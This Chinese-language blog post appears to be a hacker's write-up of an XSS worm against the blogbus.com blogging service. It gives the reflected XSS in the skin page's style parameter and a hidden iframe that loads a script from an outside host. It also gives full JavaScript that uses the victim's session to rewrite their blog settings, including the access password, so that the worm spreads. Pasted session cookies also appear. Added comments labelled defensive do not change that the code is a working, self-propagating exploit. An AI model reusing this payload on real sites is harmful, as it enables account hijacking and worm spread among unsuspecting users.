本来以为很简单，测试时却碰到了不少问题。
后台管理为:http://www.blogbus.com/user/
前台XSS为:http://xxx.blogbus.com
需要跨域。直接使用前台 cookie 提交时缺少 session_id。
博客主页cookie:
__utma=269084194.42081505.1243533426.1243533426.1243538283.2; __utmz=269084194.1243533426.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); valid=blogbus.com; bus_xuid=4856367; __utmb=269084194; __utmc=269084194; bus_uid=4856367; cmt_homepage=http%3A%2F%2F
后台cookie:
blogbus_as_hash=4be67586fb028479bc7c8e8d105d37a6; __utma=269084194.42081505.1243533426.1243533426.1243538283.2; __utmz=269084194.1243533426.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); valid=blogbus.com; bus_xuid=4856367; __utmb=269084194; __utmc=269084194; bus_uid=4856367; cmt_homepage=http%3A%2F%2F; bus_sessid=bf414d9e43c1a75274de5ab2c09567db
偷懒，找了一个非持久型 XSS，该域下的 cookie 刚好包含了 session_id。
http://www.blogbus.com/skin/?style=< … script>
后面就简单了:
http://www.blogbus.com/user/?mm=Setting
该页面允许写入任意 JS，并在前台执行。我们用一个隐藏框架将非持久型 XSS 转换为持久型。
最后贴上 exp：bug 很多，写得匆忙，把所有的选项都直接改掉了。
<iframe style="display:none" src="http://www.blogbus.com/skin/?style=<SCRIPT%20src=’http://www.delover.net/bus.js’></SCRIPT>"></iframe>
bus.js
/**
 * Build an XHR object for this browser: the legacy IE ActiveX constructor is
 * tried first, then the standard XMLHttpRequest. Yields `false` when neither
 * constructor exists.
 * @returns {XMLHttpRequest|ActiveXObject|false}
 */
function createAjax() {
var request = false;
var constructors = [
function () { return new ActiveXObject("Microsoft.XMLHTTP"); },
function () { return new XMLHttpRequest(); }
];
for (var i = 0; i < constructors.length; i++) {
try {
request = constructors[i]();
break;
} catch (e) {
// this constructor is not available here; try the next one
}
}
return request;
}
//javascript:alert(document.cookie)
// Propagation check: fetches the current user's own settings page and, unless
// the marker strings below are already present in it, calls AddNew() to
// write the payload there.
// The GET is same-origin, so the browser attaches the session cookies of
// whoever is logged in; this is why the injection had to run on
// www.blogbus.com rather than on a blog subdomain (see the prose above).
// Defensive note: the "www.blogbus.com/skin" marker is also the string to
// search stored settings for when cleaning up affected accounts.
function GetTag() {
var xmlhttp=createAjax();
if (xmlhttp) {
// blogid is hard-coded to one blog; whether the server keys on it or on the
// session is not visible here. The random query parameter is a cache-buster.
xmlhttp.open(‘get’,’/user/?blogid=4884256&mm=Setting&n=’+Math.random(),true);
xmlhttp.onreadystatechange=function() {
if (xmlhttp.readyState==4 && xmlhttp.status==200) {
// Two markers: the injected skin URL (payload already stored), or
// "img_regbtn.gif" — presumably the sign-up button shown when there is no
// logged-in session; verify against the page.
if (unescape(xmlhttp.responseText).indexOf("www.blogbus.com/skin")>=0 || unescape(xmlhttp.responseText).indexOf("img_regbtn.gif")>=0){
// already propagated (or no usable session) — nothing to do
}else{
AddNew();
}
}
}
xmlhttp.send(null);
}
}
// Persistence step: POSTs the settings form with Meta set to the URL-encoded
// hidden iframe (the same iframe shown above, though here it loads bus.js
// from delover.net rather than www.delover.net). BlogName, Description and
// AccessPwd are overwritten at the same time — the "all options changed"
// caveat mentioned in the prose. Submit decodes to "保存设置" (Save settings).
// Defensive note: the server-side fixes are output-escaping/whitelisting of
// the Meta field and a CSRF token on the Save action; the request is
// otherwise indistinguishable from a normal settings save, so detection has
// to key on the Meta content.
function AddNew() {
var xmlhttp=createAjax();
if (xmlhttp) {
var GuestInfo="BlogName=jackal&Description=jackal&AccessPwd=&Meta=%3Ciframe+style%3D%22display%3Anone%22+src%3D%22http%3A%2F%2Fwww.blogbus.com%2Fskin%2F%3Fstyle%3D%3CSCRIPT%2520src%3D%27http%3A%2F%2Fdelover.net%2Fbus.js%27%3E%3C%2FSCRIPT%3E%22%3E%3C%2Fiframe%3E&Submit=%E4%BF%9D%E5%AD%98%E8%AE%BE%E7%BD%AE";
//debug
//alert(GuestInfo);
// Same-origin POST: session cookies are attached by the browser. Random
// query parameter is a cache-buster.
xmlhttp.open(‘post’,’/user/?mm=Setting&aa=Save&n=’+Math.random(),true);
xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
xmlhttp.onreadystatechange=function() {
if (xmlhttp.readyState==4 && xmlhttp.status==200) {
// response is discarded; success is not verified
//alert(unescape(xmlhttp.responseText));
}
}
xmlhttp.send(GuestInfo);
}
}
// Entry point: runs once each time bus.js is loaded (via the hidden iframe above).
GetTag();
测试地址:http://delover.blogbus.com/